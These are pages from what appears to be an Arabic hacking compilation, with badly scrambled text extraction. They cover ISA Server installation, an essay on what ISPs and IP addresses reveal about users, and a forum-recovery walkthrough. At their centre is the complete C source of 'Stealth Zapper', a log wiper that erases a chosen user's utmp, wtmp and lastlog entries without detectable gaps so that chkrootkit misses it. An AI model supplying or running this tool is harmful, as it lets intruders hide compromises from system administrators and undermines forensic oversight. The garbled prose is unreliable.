‫وشركات إستضافة مواقع وي ِ‪                                              ..‬‬ ‫ب‪                                               ‬‬ ‫ب‬ ‫خادم ‪ ISA‬يمكن أن ينشر كبرنامج حماية يقوم مقام بوابة بین النترنت والشبكة‬ ‫ة‬ ‫في‪    ‬‬ ‫الداخلیة مع سیاسات وصول متكاملة تجعل المدراء يتبعون منھج دقیق ي‬ ‫خبیث‪             .‬‬ ‫‪.‬‬ ‫تدقیق وإعطاء ومنع الوصول غیر المخول وكشف كل محتوى‬ ‫‪                                                          ISA‬‬ ‫ج ‪I‬‬ ‫تثبیت البرنامج‬ ‫مع‪     ‬‬ ‫تثبیت البرنامج ھو في غاية السھ ولة لمن له خبرة بسیطة في التعامل ع‬ ‫بك‪ ‬‬ ‫برامج وتطبیقات مايكروسوفت ‪ ،‬فبعد أن تكون قد اشتريت النسخة الخاصة ك‬ ‫م‪    ‬‬ ‫علیك بتفحص المتطلبات الرئیسیة لتركیب الخادم على شبكتك ‪ ،‬ومن أھم‬ ‫مايلي‪                                                               :-‬‬ ‫‪:‬‬ ‫ذالك‬ ‫ى‪                                  ‬‬ ‫جھاز بنتیوم ‪ megahertz 003 - 2‬حد أدنى‬ ‫‪                                   612‬‬ ‫‪     Microsoft Windows‬‬ ‫‪M‬‬ ‫نظام التشغیل يجب أن يكون أحد النظم التالیة ‪0002‬‬ ‫‪  , Microsoft Windows 2000 Advanced‬‬ ‫‪,‬‬ ‫‪Server‬مع ‪ Service Pack 1‬أو أعلى‬ ‫‪             Microsoft Windows‬‬ ‫‪M‬‬ ‫‪Server‬مع ‪ Service Pack 1‬أو اعلى‪ ,‬أو ‪0002‬‬ ‫‪                                                          Datacenter Server‬‬ ‫‪                                                       memory‬‬ ‫‪m‬‬ ‫‪256 MB‬من الــ‬ ‫ب‪                                ‬‬ ‫‪20 MB‬من المساحة الحرة على القرص الصلب‬ ‫ة‪            ‬‬ ‫كرت شبكة يكون متوافق مع الويندوز ‪ 0002‬للوصول للشبكة الداخلیة‬ ‫‪                                                       NTFS‬‬ ‫‪N‬‬ ‫مقطع يكون بنظام‬ ‫م‬ ‫إذا كنت ستركب البرنامج كـ ‪ array‬وتريد تطبیق سیاسة المن المتقدم يجب أن‬ ‫ن‬ ‫‪               Active Directory‬‬ ‫‪A‬‬ ‫تكون الشبكة وخادم الشبكة علیه الدلیل النشط‬ ‫ط‬ ‫التثبیت‪                                                                 ‬‬ ‫ت‬ ‫نوعیة‬ ‫‪   ISA‬‬ ‫‪I‬‬ ‫لنوعیة التثبیت أھ میة كبیرة في تثبیت البرنامج وذالك بإختیار صفة خادم‬ ‫ھل سیكون خادم مستقل ام سیكون ‪ ، array‬والفرق بین الخادم المستقل والــ‬ ‫ط‪       ‬‬ ‫‪array‬ھو الـ ‪ array‬يتم التعامل مع نظام الشبكة كـ میدان في دلیل نشط‬ ‫الخادم‪     ‬‬ ‫م‬ ‫ويأخذ كل بیانات المستخدمین من قاعدة بیانات ذالك الدلیل ‪ ،‬وفي‬ ‫المستقل ‪ stand­alone server‬ل يتطلب وجود میدان ول دلیل نشط ‪ ،‬وإذاا‪      ‬‬ ‫كانت ھذه اول مرة تثبت فیھا خادم ‪ ISA‬على الجھ از وكنت تريد التثبیت يكون كــ‬ ‫ت‪   ‬‬ ‫‪array‬فیجب علیك أو ً ان تثبت ‪ ISA Server schema‬وھو برنامج صغیر يثبت‬ ‫ل‪                                                        ‬‬ ‫ل‬ ‫في الدلیل النشط مرة واحدة فقط ولیس علیك تثبیته مرة أخرى حتى لو حذفت‬ ‫ت‬ ‫خادم ‪ ISA‬من الشبكة واردت تثبیته مرة ثانیة‪                                 ..‬‬ ‫م‪ ‬‬ ‫فإذا كان لديك میدان مع دلیل نشط ‪ Active Directory‬ل تركب البرنامج ( خادم‬ ‫‪              stand­alone server‬‬ ‫‪s‬‬ ‫( ‪ISA‬إل كـ ‪ ، array‬وإن كان بإمكانك تثبیته كـ‬ ‫التثبیت‪                                                              ‬‬ ‫ت‬ ‫خصائص‬ ‫‪                                      712‬‬ ‫يلي‪             :-‬‬ ‫‪:‬‬ ‫يمكن التثبیت على ثلث أشكال وھي على التوالي كما‬ ‫‪                                                                     firewall‬‬ ‫‪                                                                       cache‬‬ ‫‪                                                                  integrated‬‬ ‫ن‪                               ‬‬ ‫أن نمط ‪ integrated‬يجمع كل ممیزات الثنین‬ ‫خطوة‪                                                        ‬‬ ‫ة‬ ‫التثبیت خطوة‬ ‫‪                                            array‬‬ ‫‪a‬‬ ‫سنقوم بتثبیت البرنامج كــ‬ ‫القراص‪                            ‬‬ ‫ص‬ ‫أدخل القرص الیزري للبرنامج في محرك‬ ‫‪I‬‬ ‫‪Install ISA Server‬‬ ‫سیعمل القرص ويفتح نافذة تثبیت البرنامج ‪ ،‬اضغط على‬ ‫ى‬ ‫اكمل‪                                            ‬‬ ‫ل‬ ‫تظھر لك شاشة الترحیب‬ ‫تابع‪                        ‬‬ ‫ثم شاشة رقم تسجیل البرنامج أدخل الرقم ثم ع‬ ‫‪                                       I Agree‬‬ ‫‪I‬‬ ‫شاشة التفاقیة اضغط على‬ ‫ى‬ ‫‪                        Full‬‬ ‫اختر ‪F‬‬ ‫ر‬ ‫اختیار نوع التثبیت ‪Typical , Full , Custom‬‬


‫م‪  ‬‬ ‫السؤال عن رغبتك في تثبیت البرنامج كـ ‪ array‬أو ‪ stand­alone‬اضغط نعم‬ ‫‪                                                    array‬‬ ‫‪a‬‬ ‫اكتب اسم لھذا الـ‬ ‫‪ Use default policy settings‬‬ ‫‪U‬‬ ‫من ھ ذه الشاشة اختر نوع إعدادت المن اختر‬ ‫ر‬ ‫الخیر‪ ‬‬ ‫ر‬ ‫ثم من الشاشة التالیة اختر شكل ونوع الخادم الذي تريد اختر الخیار‬ ‫‪                                   812‬‬ ‫يخبر برنامج التثبیت أن البرنامج سیعطل المنافذ ‪ 0808‬و ‪ 08‬من اجل خادم ‪I‬‬ ‫‪IIS‬‬ ‫المقطع‪                   ‬‬ ‫ع‬ ‫من النافذة التالیة اختر مكان التثبیت اختر نفس‬ ‫لديك‪                              ‬‬ ‫في النافذة التالیة اكتب مجال العناوين ك‬ ‫‪                                912‬‬ ‫اء‪    ‬‬ ‫تبدأ عملیة التثبیت وسینتھي سريعً ‪ ،‬ثم تظھ ر لك نافذة تخبرك عن إنتھ ء‬ ‫اا‪                                       ‬‬ ‫التثبیت‪                                                          ‬‬ ‫ت‬ ‫عملیة‬ ‫افتح البرنامج ستجد كثیر من الدوات التي تتحكم بھاا‪                        ‬‬ ‫‪                                     ISA‬‬ ‫م ‪I‬‬ ‫تمكین الوصول للنترنت على خادم‬ ‫د‪     ‬‬ ‫في كثیر من الحیان يكون الوصول للنترنت من خادم ‪ ISA‬غیر ممكن عند‬ ‫على‪    ‬‬ ‫التثبیت الول ولتمكین التصال يجب تأھیل بعض البروتوكولت للعمل ى‬ ‫الخادم مثل بروتوكول ‪ HTTPS‬و بروتوكول ‪ HTTP‬وفي الصورة المرفقة بالمرفقات‬ ‫ت‬ ‫الخادم‪                    ‬‬ ‫م‬ ‫كل البروتوكولت المھ مة التي يجب أن تعمل على‬ ‫البروتوكول‪                                                        ‬‬ ‫ل‬ ‫تأھیل‬ ‫‪                                  022‬‬ ‫افتح خادم ‪ ISA‬ثم من على اسم الـ ‪ array‬ثم من ‪ ، IP Packet Filters‬من ھناا‬ ‫تمنع‪              ‬‬ ‫تمكن أي بروتوكول من الدخول أو الخروج وكذالك يمكن أن ع‬ ‫‪ create the IP Packet Filters‬‬ ‫‪c‬‬ ‫من الخیارات التي تكون في الجھة الیمین اختر‬ ‫عن‪  ‬‬ ‫سیفتح لك معالج في النافذة الولي اختر اسم للعملیة ولیكن اسم معبر ن‬ ‫ورقم‪     ‬‬ ‫م‬ ‫البروتوكول المراد تأھ یله ثم اكمل باقي النوافذ بالبروتوكول المناسب‬ ‫المنفذ‪                                                                    ‬‬ ‫ذ‬ ‫تتكرر‪   ‬‬ ‫ر‬ ‫وقبل تأھ یل أي بروتوكول راجع البروتوكولت الموجودة من قبل حتى ل‬ ‫البروتوكول‪                                      ‬‬ ‫ل‬ ‫عملیة التأھیل مرتین لنفس‬ ‫أي‪      ‬‬ ‫وكذالك دون كل عملیة تقوم بھا حتى ترجع إلیھا بسھولة عند حدوث ي‬ ‫التصال‪                                                       ‬‬ ‫ل‬ ‫مشكلة في‬ ‫‪                                   122‬‬ ‫المزود؟‪                           ‬‬ ‫؟‬ ‫ماذا یعرف عنك‬ ‫ماذا‪       ‬‬ ‫ا‬ ‫یظن بعض مستخدمي إنترنت‪ ،‬وخاصة المبتدئین منهم‪ ،‬أن ل أحد یستطیع اكتشاف‬ ‫التسجیل‪         ‬‬ ‫ل‬ ‫یفعلون على إنترنت‪ :‬المواقع التي یزورونها‪ ..‬المعلومات التي یقدمونها أثناء‬ ‫غرف‪    ‬‬ ‫في بعض المواقع‪ ،‬أو الشراء‪ ..‬الحوارات التي یشاركون فیها ضمن المنتدیات أو في ف‬ ‫التي‪               ‬‬ ‫الدردشة‪ ..‬الرسائل التي یكتبونها للمجموعات الخباریة الكلمات والعبارات ي‬ ‫یجلبونها‪                              ..‬‬ ‫‪.‬‬ ‫ینقبون عنها باستخدام محركات البحث‪ ..‬الملفات التي‬ ‫إلكتروني‪   ‬‬ ‫ي‬ ‫ویعتقد بعض هؤلء أنه یكفي أن تدخل ساحات الحوار باسم مستعار وعنوان برید‬ ‫بأجمعه‪                                                   ‬‬ ‫ه‬ ‫زائف‪ ،‬كي تخفي هویتك عن العالم‬ ‫كل‪        ‬‬ ‫كل هذه المعتقدات خرافات ل أساس لها من الصحة‪ .‬فأخوك الكبر ل ینام‪ ،‬ویسجل ل‬ ‫عنك!‪     ‬‬ ‫!‬ ‫حركاتك وسكناتك‪ ..‬ومضیفوك فضولیون وقادرون على جمع الكثیر من المعلومات‬ ‫إنترنت‪      ‬‬ ‫ت‬ ‫لكن‪ ،‬من هو الخ الكبر؟ إنه الجهة التي تصلك بإنترنت‪ ،‬وهي إما مزود خدمات‬ ‫الرئیسي‪                                                                                  ‬‬ ‫ي‬ ‫‪                                                                                   )(ISP‬‬ ‫معه‪                                                                           ‬‬ ‫الذي تشترك ه‬ ‫أو كمبیوتر مؤسستك‪ ،‬إذا كانت تتصل بإنترنت عن طریق خط خاص مؤجر أما مضیفوك‪ ،‬فهم‬ ‫م‬ ‫إنترنت‪                                           ‬‬ ‫ت‬ ‫المواقع التي تزورها وأنت تبحر في عباب‬ ‫جهتین‪                                                   ‬‬ ‫ن‬ ‫تخترق خصوصیتك في الشبكة من‬ ‫ل‪                          ‬‬ ‫ل‬ ‫مزودك بخدمة التصال بإنترنت وهو اختراق یمكن أن یكون شام ً‪                          ‬‬


‫اختراق‪        ‬‬ ‫ق‬ ‫المواقع التي تزورها‪ ،‬ومنتدیات الحوار التي تشارك فیها‪ ،‬أیً كان نوعها‪ ،‬وهو‬ ‫اا‪                                  ‬‬ ‫أحیان‪                                                                   ‬‬ ‫ن‬ ‫جزئي‪ ،‬لكنه خطر‪،‬‬ ‫الواقعیة‪          ‬‬ ‫ة‬ ‫ربما تسلل الخوف إلیك بعد قراءة السطور السابقة‪ ،‬لكن‪ ،‬تعال نتبین الصورة‬ ‫ذلك‪                                                                                  ‬‬ ‫لكل ك‬ ‫؟‪                                                      ‬‬ ‫ماذا یسجل مزود خدمات إنترنت عنك ؟‬ ‫تتصل‪         ‬‬ ‫ل‬ ‫یمكن لمزود خدمات إنترنت‪ ،‬من الناحیة النظریة‪ ،‬أن یكتشف كل أفعالك عندما‬ ‫‪                                        222‬‬ ‫اطلعت‪     ‬‬ ‫ت‬ ‫بالشبكة‪ ،‬ویشمل ذلك‪ ،‬عناوین المواقع التي زرتها‪ ،‬ومتى كان ذلك‪ ،‬والصفحات التي‬ ‫فیها‪         ،‬‬ ‫‪،‬‬ ‫علیها‪ ،‬والملفات التي جلبتها‪ ،‬والكلمات التي بحثت عنها‪ ،‬والحوارات التي شاركت‬ ‫والخدمات‪              ‬‬ ‫ت‬ ‫والبرید اللكتروني الذي أرسلته واستقبلته‪ ،‬وفواتیر الشراء التي ملتها‪،‬‬ ‫مزود‪           ‬‬ ‫د‬ ‫التي اشتركت بها‪ .‬لكن‪ ،‬تختلف من الناحیة الفعلیة‪ ،‬كمیة المعلومات التي یجمعها‬ ‫مزود‪           ‬‬ ‫د‬ ‫خدمات إنترنت عنك‪ ،‬باختلف التقنیات والبرمجیات التي یستخدمها‪ .‬فإذا لم یكن‬ ‫الحزم‪         ‬‬ ‫م‬ ‫الخدمة یستخدم مزودات بروكسي (تتسلم وتفلتر كل طلباتك)‪ ،‬وبرمجیات تحسس‬ ‫ك‪     ‬‬ ‫" ‪ ) "packet sniffer‬تحلل حركة المرور بتفصیل كبیر)‪ ،‬فقد ل یسجل عنك‪ ،‬سوى بیاناتك‬ ‫ك‪    ‬‬ ‫الشخصیة‪ ،‬ورقم ‪ IP‬الخاص بالكمبیوتر المتصل‪ ،‬وتاریخ وزمن اتصالك بالشبكة‪ ،‬وانفصالك‬ ‫بالبرمجیات‪         ‬‬ ‫ت‬ ‫عنها‪ .‬أما إذا كان اتصالك یمر عبر "بروكسي"‪ ،‬فترتبط مستوى التفصیلت‬ ‫النظري‪   ،‬‬ ‫‪،‬‬ ‫التي یستخدمها مزود الخدمة‪ ،‬والتي یمكن أن تصل في حدها القصى‪ ،‬إلى المستوى‬ ‫مؤجر‪      ،‬‬ ‫‪،‬‬ ‫ق‪ .‬وینطبق ما ذكرناه‪ ،‬في حال كان اتصالك یتم عبر خط خاص‬ ‫الذي أشرنا إلیه ساب ً‬ ‫اا‪                                                                        ‬‬ ‫فیها‪                                                                    .‬‬ ‫‪.‬‬ ‫للمؤسسة التي تعمل‬ ‫على‪   ‬‬ ‫أما الخبار الطیبة لمستخدمي إنترنت‪ ،‬فهي أن معظم مزودي خدمات إنترنت ل یطلعون ى‬ ‫وهو‪    ‬‬ ‫السجلت‪ ،‬ما لم یطلب منهم ذلك بأمر رسمي من الجهات المسؤولة عن تطبیق القانون‪ ،‬و‬ ‫تتطلب‪                ‬‬ ‫ب‬ ‫أمر نادر الحدوث‪ .‬تبقى إمكانیة التطفل على أفعال المشتركین قائمة‪ ،‬لكنها‬ ‫مستعدین‪       ‬‬ ‫ن‬ ‫ت طوی ً‪ ،‬بالضافة إلى أن معظم مزودي خدمات إنترنت غیر‬ ‫جهود ً كبیرة‪ ،‬ووق ً‬ ‫اا‪                                                                   ‬‬ ‫ا‬ ‫ل‬ ‫بمراقبة‪                ‬‬ ‫ة‬ ‫للمخاطرة بسریة المشتركین‪ ،‬وخسارة بعضهم‪ .‬ول یهتمون‪ ،‬لهذا السبب‪،‬‬ ‫لتحریر‪                 ‬‬ ‫ر‬ ‫المشتركین‪ ،‬بدللة أنهم یرسلون رسائل البرید الصادر‪ ،‬بأسرع ما یمكن‪،‬‬ ‫الوارد‪               ،‬‬ ‫‪،‬‬ ‫المساحات التي یشغلها على القراص الصلبة‪ .‬ویحذفون البرید اللكتروني‬ ‫الخاص‪                                  ..‬‬ ‫‪.‬‬ ‫بسرعة‪ ،‬بعد أن یجلبه مستخدم إنترنت إلى كمبیوتره‬ ‫خطوط‪        ‬‬ ‫ط‬ ‫قد یختلف المر بالنسبة للعاملین في المؤسسات الكبیرة‪ ،‬التي تتصل بإنترنت عبر‬ ‫خاصة مؤجرة‪ ،‬ویتوفر لدیها مزود داخلي‪ .‬فمن مصلحة مدراء هذه المؤسسات‪ ،‬فرض رقابة على‬ ‫ى‬ ‫والدردشة‪         ،‬‬ ‫‪،‬‬ ‫الموظفین‪ ،‬لمنعهم من تبدید وقت العمل في تصفح مواقع الریاضة‪ ،‬والترفیه‪،‬‬ ‫یعملون‪             ‬‬ ‫ن‬ ‫ض‪ ،‬للتأكد من أنهم ل‬ ‫على شبكة ویب‪ .‬وربما یراقبون بریدهم اللكتروني أی ً‬ ‫اا‪                                       ‬‬ ‫في‪       ‬‬ ‫لحساب جهة أخرى‪ ،‬أو لحسابهم الخاص‪ .‬فإذا كنت واحد ً من هؤلء الموظفین‪ ،‬فحاذر ي‬ ‫اا‪                                       ‬‬ ‫‪                                   ..‬‬ ‫كیفیة استخدامك للشبكة‪ ،‬فربما یوجد من یراقب تصرفاتك! ‪.‬‬ ‫‪                                           322‬‬ ‫نمبر؟‪                         ‬‬ ‫؟‬ ‫ماذا یكشف رقم البي‬ ‫الذي‪         ‬‬ ‫عندما یزور شخص موقعً على الشبكة‪ ،‬یسجل الموقع رقم البي العائد للكمبیوتر ي‬ ‫اا‪                                                                 ‬‬ ‫اتصل به‪ .‬وعند إرسال رسالة إلكترونیة‪ ،‬یمكن لمتسلم الرسالة معرفة عنوان البي ‪           ،،‬‬ ‫ینقر‪               ‬‬ ‫للكمبیوتر المرسل‪ ،‬أیض ً‪ .‬فإذا كان یستخدم برنامج مث ً الوتلوك‪ ،‬فیكفي أن ر‬ ‫اا‪                                       ‬‬ ‫ل‬ ‫عنوان‪                ‬‬ ‫ن‬ ‫على اوبشن بعد أن یفتح الرسالة‪ ،‬لیطلع على عنوان البي لكن‪ ،‬هل یحدد‬ ‫خاص‪    ‬‬ ‫الكمبیوتر المتصل‪ ،‬بدقة؟ إذا كان الكمبیوتر المتصل‪ ،‬ینتمي إلى شبكة مرتبطة بخط ص‬ ‫مؤجر كما هو حال العدید من شبكات المؤسسات المتوسطة والكبیرة‪ ،‬فسوف یكشف عنوان عن‬ ‫ن‬ ‫المتصل‪                                                 .‬‬ ‫‪.‬‬ ‫اسم تلك المؤسسة‪ ،‬ورقم الكمبیوتر‬ ‫لتحدید‪   ‬‬ ‫د‬ ‫أما إذا كان الكمبیوتر یتصل عن طریق طلب رقم هاتف عادي فل یكفي رقم البي ‪،‬‬


‫الجهة المتصلة بالموقع (أو التي بعث برسالة)‪ ،‬إذا سیكشف القسمان الول والثاني من‪         ‬‬ ‫الرقم‪ ،‬بدًء من الیسار‪ ،‬عن اسم مزود خدمات إنترنت‪ ،‬الذي یشترك لدیه المتصل‪ ،‬فیما‪        ‬‬ ‫ا‪                                                                                ‬‬ ‫یحدد القسمان الثالث والرابع‪ ،‬رقم مجموعة الكمبیوترات‪ ،‬والكمبیوتر المتصل لدى مزود‪      ‬‬ ‫الخدمة‪ ،‬على التوالي‪ ،‬ولیس الكمبیوتر الذي أجرى التصال الولي‪ .‬وقد یحمل‪ ،‬لهذا‪           ‬‬ ‫السبب‪ ،‬العدید من المتصلین عن طریق مزود خدمة واحد‪ ،‬عناوین متطابقة‪ ،‬إذا جرى‪         ‬‬ ‫التصال في أوقات مختلفة‪ .‬كیف یمكن اكتشاف المتصل (أو مرسل الرسالة) في هذه الحالة‪  ،‬‬ ‫إن ارتكب مخالفة قانونیة؟‪                                                                 ‬‬ ‫یمكن ذلك عن طریق مزود خدمة إنترنت (‪                                            (ISP‬‬ ‫الذي تحتفظ كمبیوتراته‪ ،‬بسجلت عن كافة التصالت‪ ،‬تضم حق ً لرقم ‪ ،‬وحقلین لكل من‪    ‬‬ ‫ل‪                            ‬‬ ‫تاریخ وزمن التصال وحق ً لسم المشترك‪ .‬ویكفي أن تزوده الجهة المتضررة بقیمة‪          ‬‬ ‫ل‪                                                              ‬‬ ‫الحقول الثلثة الولى (تكون مسجلة لدیها)‪ ،‬كي یكتشف اسم المشترك‪ .‬ویمكنه بالتعاون‪       ‬‬ ‫مع مؤسسة الهاتف‪ ،‬الوصول إلى الرقم الذي تم عن طریقه التصال‪ .‬لكن هذه الجراءات‪     ‬‬ ‫تتطلب تدخ ً من قبل الجهات الرسمیة المشرفة على تطبیق القانون‪                           .‬‬ ‫ل‪                                                                              ‬‬ ‫‪                                        422‬‬ ‫‪StealthZapper‬لمسح تحركاتك من على السیرفر‪          ..‬‬ ‫للكاتب‪                                                                       HeLL RaiSeR:‬‬ ‫السلم علیكم‪                                                                              ..‬‬ ‫عمل ھالكود ‪ ..‬ھ و مسح و حذف اللوج من على السیرفر لشخص انت تحدده‪ ..‬‬ ‫كود‪                                                                                         :‬‬ ‫]‪// Stealth Zapper 1.0 by Topo[LB‬‬ ‫‪//‬‬ ‫‪// Erases the utmp,wtmp and lastlog entries for a specific user.‬‬ ‫‪// Unlinke classic zappers, it does not leave "holes" on wtmp and utmp files.‬‬ ‫‪// Now, it won't be possible to detect that this zapper have ever been ran on the system‬‬ ‫‪//   => chkrootkit and antizap should not detect anything.‬‬ ‫‪//‬‬ ‫‪// It also detects the traces left in the utmp/wtmp logs by other classic zappers.‬‬ ‫‪//‬‬ ‫‪// Tested under GNU/Linux‬‬ ‫‪//‬‬ ‫‪// Please, use it for educational purposses only.‬‬ ‫>‪#include   <stdio.h‬‬ ‫>‪#include   <time.h‬‬ ‫>‪#include   <string.h‬‬ ‫>‪#include   <utmp.h‬‬ ‫>‪#include   <getopt.h‬‬ ‫>‪#include   <lastlog.h‬‬ ‫>‪#include   <pwd.h‬‬ ‫>‪#include   <unistd.h‬‬ ‫>‪#include   <sys/types.h‬‬ ‫"‪#define VERSION             "1.0‬‬ ‫;‪short verbose=0‬‬ ‫;‪short erasezaps=0‬‬ ‫;‪short analyze=0‬‬ ‫{)‪void Version(char *program‬‬ ‫;)‪          printf("\n%s\n\n",VERSION‬‬


exit (1); } void Usage(char *program){                                                 225          printf ("Usage: %s [­u user | ­s] [­h] [­v] [­V]\n\n", program);          printf(" ­u <user>           Erases the log entries for this user.\n");          printf(" ­s         Removes traces of previously ran zappers\n");          printf(" ­a         Analyze log files searching zapper traces\n");          printf(" ­v: be verbose\n");          printf(" ­V: prints program version and exits\n");          printf(" ­h: prints this help ;)\n\n");          exit(0); } void Exiterror(char *error){          printf ("\n ERROR: %s \n\n",error);          printf ("Take a look at the help using ­h\n\n");          exit(0); } void Banner(void){          printf("\nStealth Zapper 1.0 by Topo[LB]\n\n"); } void CleanUTMP(char *username, char *filename){          FILE *file;          FILE *file2;          long finallenght=0;          //long lastposition=0;          struct utmp r_uwtmp;          struct utmp r_uwtmp_zero;          int i=0;          short entryfound=0;          long timebefore;          long timeafter;          short haveprint=0;          int deletedentries=0;          int totaldeletedentries=0;          char asctimebefore[256];          char asctimeafter[256];          bzero(&r_uwtmp_zero, sizeof(r_uwtmp_zero));          if(!(file=fopen(filename, "r"))){                    printf(" Error opening file %s\n\n", filename);                    return;          }                                                   226         if (!analyze){                   if(!(file2=fopen(filename, "r+"))){                              printf(" Error opening file %s\n\n", filename);                              return;                   }         }         if (analyze){


timebefore=0;                  while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) {                              if(!bcmp(&r_uwtmp,&r_uwtmp_zero,sizeof(r_uwtmp))){                                        haveprint=1;                                        totaldeletedentries++;                                        deletedentries++;                              }else {                                        if (!haveprint) timebefore=r_uwtmp.ut_time;                                        else {                                                 timeafter=r_uwtmp.ut_time;                                                 strcpy(asctimebefore,ctime( (time_t *)&timebefore));                                                 strcpy(asctimeafter,ctime( (time_t *)&timeafter));                                                 printf (" [!!!] Detected %u deleted entries between %s and %s\n",deletedentries, asctimebefore, asctimeafter);                                                 fflush(stdout);                                                 deletedentries=0;                                                 haveprint=0;                                                 timebefore=r_uwtmp.ut_time;                                        }                              }                   }                   if (haveprint) {                              strcpy(asctimebefore,ctime( (time_t *)&timebefore));                              strcpy(asctimeafter,ctime( (time_t *)&timeafter));                              printf (" [!!!] Detected %u deleted entries between %s and %s\n",deletedentries, asctimebefore, asctimeafter);                              fflush(stdout);                   }                   if (!totaldeletedentries) printf ("\n [INFO] No zapper found :)\n\n");                   else printf ("\n [!!!] ZAPPER FOUND. %d entries were deleted by someone!\n\n",totaldeletedentries);         }                                                     227           if (!erasezaps && !analyze) while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) {                     if(!strcmp(r_uwtmp.ut_name, username)){                               if (verbose) printf("Entry detected for %s on %s. Deleting it!\n",username, ctime( (time_t *) &r_uwtmp.ut_time));                               totaldeletedentries++;                               entryfound=1;                     }         else {                               if (entryfound) fwrite((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file2);                               else fseek(file2, sizeof(r_uwtmp), SEEK_CUR);                     }           }           if (erasezaps && !analyze) while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) {                     if(!bcmp(&r_uwtmp, &r_uwtmp_zero, sizeof(r_uwtmp))){                               if (verbose) printf("Erased entry detected!\n");


totaldeletedentries++;                              entryfound=1;                     }         else {                               if (entryfound) fwrite((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file2);                               else fseek(file2, sizeof(r_uwtmp), SEEK_CUR);                     }           }           fclose(file);           if (!analyze){                     finallenght=ftell(file2);                     fclose(file2);                     if (entryfound) if (truncate(filename,finallenght)){                               printf("WARNING! truncate() error");                     }           }           if (!totaldeletedentries){                     if (!analyze && !erasezaps) printf (" User %s not found!\n\n",username);                     if (!analyze) printf (" NO zap entries detected. 0 entries cleaned\n\n");           }           else{                     if (!analyze && !erasezaps) printf (" %d entries cleaned for user %s!\n\n",totaldeletedentries,username);                     if (!analyze) printf (" %d entries cleaned\n\n",totaldeletedentries);                                                     228          } } void CleanLastlog(char *username, char *filename) {          FILE *file;          struct passwd *p_passwd;          struct lastlog r_lastlog;          int i=0;          if((file=fopen(filename,"r+"))==NULL){                    printf(" Error opening file %s\n\n", filename);                    return;          }          if ((p_passwd=getpwnam(username))==NULL){                    printf (" User %s not found!\n\n",username);                    return;          }          fseek(file, (long)(p_passwd­>pw_uid*sizeof(r_lastlog)),SEEK_SET);          bzero((char *)&r_lastlog, sizeof(r_lastlog));          fwrite((char *)&r_lastlog, sizeof(r_lastlog),1,file);          fclose(file);          printf("Lastlog file cleaned for user %s!\n\n",username); } int main(int argc, char *argv[]) {          char username[UT_LINESIZE]="";          int i;          Banner();          if (argc<2) Usage(argv[0]);


while((i=getopt(argc, argv, "avVshu:")) != EOF) {                    switch(i) {                              case 'V':                                        Version(argv[0]);                                        break;                              case 'h':                                        Usage(argv[0]);                                                   229                                       break;                             case 'v':                                       verbose=1;                                       break;                             case 's':                                       erasezaps=1;                                       break;                             case 'a':                                       analyze=1;                                       break;                             case 'u':                                       if (!optarg) Exiterror("If you use ­u you must provide a username!");                                       if(strlen(optarg)>UT_LINESIZE){                                                 printf("username is too long\n");                                                 exit(0);                                       }                                       strcpy(username, optarg);                                       break;                             default :                                       Exiterror("Unknown parameter");                                       break;                   }         }         if (!erasezaps && !analyze && username[0]==0) Exiterror("You must use either ­s or ­u <user>");         printf(" UTMP Cleaning ...\n");         fflush(stdout);         CleanUTMP(username, _PATH_UTMP);         printf(" WTMP Cleaning ...\n");         fflush(stdout);         CleanUTMP(username, _PATH_WTMP);         if (!analyze && !erasezaps){                   printf(" LASTLOG Cleaning ...\n");                   fflush(stdout);                   CleanLastlog(username, _PATH_LASTLOG);         } }                                                    230                                           root ..‫ لستخدامه يشترط انك تكون‬:‫ملحظة‬                                                         :‫الستخدام بعد الكومبايل يكون كذا‬                                                                                        :‫كود‬


‫]‪Usage: ./(name after compile) [­u user | ­s] [­h] [­v] [­V‬‬ ‫‪ ­u <user>        Erases the log entries for this user.‬‬ ‫‪ ­s      Removes traces of previously ran zappers‬‬ ‫‪ ­a      Analyze log files searching zapper traces‬‬ ‫‪ ­v: be verbose‬‬ ‫‪ ­V: prints program version and exits‬‬ ‫);‪ ­h: prints this help ‬‬ ‫للمزيد من الــ‪                                                               Log WipperS‬‬ ‫زر ھذا الرابط‪                                                                              ‬‬ ‫‪                                                231‬‬ ‫شرح طريقة استرجاع المنتدى بعد اختراقه بالصور‪        ‬‬ ‫للكاتب‪ :‬ضب متلطم‪                                                         ‬‬ ‫بسم االله الرحمن الرحیم‪                                                    ‬‬ ‫السلم علیكم ورحمة االله وبركاته‪                                            ‬‬ ‫يا اخواني ھ ذا شرح لطريقة استرجاع المنتدى بعد اختراقه وايضا اذا حدثت‪    ‬‬ ‫عندك مشكله بالیوزرات تقدر تحلھا من ھ نا لن بعض الخوان اذا حدثوا النسخه‬ ‫تصیر معھم مشاكل مع اسم المشرف العام‪                                 ‬‬ ‫واذا كان الموضوع موجود مسبقا فزيادة الخیر خیرين‪                          ‬‬ ‫بسم االله نبدا‪                                                              ‬‬ ‫اول شي تدخل على لوحة تحكم الموقع‪                                     ‬‬ ‫نضغط على ايقونة قاعدة البیانات نفس الصوره اللي تحت‪                      ‬‬ ‫و بعد ما تضغط على ايقونة قاعدة البیانات بیفتح لك صفحة قواعد البیانات انزل‪ ‬‬ ‫الى اخر الصفحه واضغط على ‪ phpMyAdmin‬ثم اكمل الشرح‪                  ‬‬ ‫الن اتبع الصور مشروح علیھا ال بعضھا سیتم التعلیق علیھا في اسفلھا‪      ‬‬ ‫‪                                    232‬‬ ‫ستخرج لك قائمه على الیسار اختر منھا‪                                 ‬‬ ‫بعدھ ا تفتح لك صفحه اختر من القائمه اللي فوق الموجود في الصوره اللي‪ ‬‬ ‫تحت‪                                                                 ‬‬ ‫الصوره في السفل اتبع شرحھا بالرقام‪                                  ‬‬ ‫الشرح‪                                                              ::‬‬ ‫‪1‬لتحرير العضو اي الدخول لتغییر اسمه او بريده‪                        ‬‬‫‪2‬حذف العضو‪                                                        ‬‬‫‪3‬رقم العضو‪                                                          ‬‬‫‪4‬رقم مجموعة العضو والرقم الموجود ھو رقم ‪ :: 6 ::‬اللي ھو رقم مجموعة‬‫الـ ‪ administrator‬وھذا الرقم يھ منا اذا كان اسم المشرف العام محذوف اتبع‬ ‫الشرح وتعرف الھمیه‪                                                  ‬‬ ‫‪                                332‬‬ ‫‪5‬اسم المشرف العام طبعا اذا اخترق احد المنتدى يبي يغیر السم عشان‪   ‬‬‫كذا الرقم يھ منا 